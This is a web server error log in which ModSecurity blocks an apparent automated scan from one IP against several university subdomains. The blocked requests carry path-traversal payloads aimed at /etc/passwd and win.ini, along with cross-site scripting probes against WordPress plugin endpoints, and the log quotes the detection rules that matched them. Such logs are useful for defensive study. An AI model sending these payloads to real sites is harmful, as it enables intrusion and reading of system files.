[Tue Aug 29 11:54:50.613648 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAApbUXoAAAAh"]
[Tue Aug 29 11:54:50.644713 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAo2nEEAAAAA"]
[Tue Aug 29 11:54:50.653260 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAApbUXsAAAAh"]
[Tue Aug 29 11:54:50.656901 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAApXghUAAAAU"]
[Tue Aug 29 11:54:50.682108 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAApXghYAAAAU"]
[Tue Aug 29 11:54:50.704335 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqSwlQAAAAN"]
[Tue Aug 29 11:54:51.548986 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAqUB5gAAAAb"]
[Tue Aug 29 11:54:51.632483 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16G8Co-f0AAApk-ZAAAAAn"]
[Tue Aug 29 11:54:51.632579 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16G8Co-f0AAAoz79gAAAAS"]
[Tue Aug 29 11:54:51.763015 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAqWwaIAAAAl"]
[Tue Aug 29 11:54:52.555131 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqWwaMAAAAl"]
[Tue Aug 29 11:54:52.561533 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAApXgh4AAAAU"]
[Tue Aug 29 11:54:52.574531 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqXySoAAAAq"]
[Tue Aug 29 11:54:52.575004 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAApbUYAAAAAh"]
[Tue Aug 29 11:54:52.599901 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAApXgh8AAAAU"]
[Tue Aug 29 11:54:52.638184 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqSwlkAAAAN"]
[Tue Aug 29 11:54:52.639519 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16HMCo-f0AAApk-ZUAAAAn"]
[Tue Aug 29 11:54:52.653286 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqXyS0AAAAq"]
[Tue Aug 29 11:54:52.669632 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAApa-IQAAAAg"]
[Tue Aug 29 11:54:52.673356 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAoAk8MAAAAC"]
[Tue Aug 29 11:54:52.693208 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqRzFUAAAAM"]
[Tue Aug 29 11:54:53.942857 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HcCo-f0AAAqWwakAAAAl"]
[Tue Aug 29 11:54:53.985255 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HcCo-f0AAAqhN-IAAAAE"]
[Tue Aug 29 11:54:54.017686 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HsCo-f0AAAoAk8UAAAAC"]
[Tue Aug 29 11:54:54.036844 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqUB6IAAAAb"]
[Tue Aug 29 11:54:54.055856 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAApa-IYAAAAg"]
[Tue Aug 29 11:54:54.412146 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqUB6MAAAAb"]
[Tue Aug 29 11:54:54.757591 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqY58gAAAAr"]
[Tue Aug 29 11:54:55.543202 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAApa-IsAAAAg"]
[Tue Aug 29 11:54:55.547097 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAApbUYYAAAAh"]
[Tue Aug 29 11:54:55.551292 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqhN-YAAAAE"]
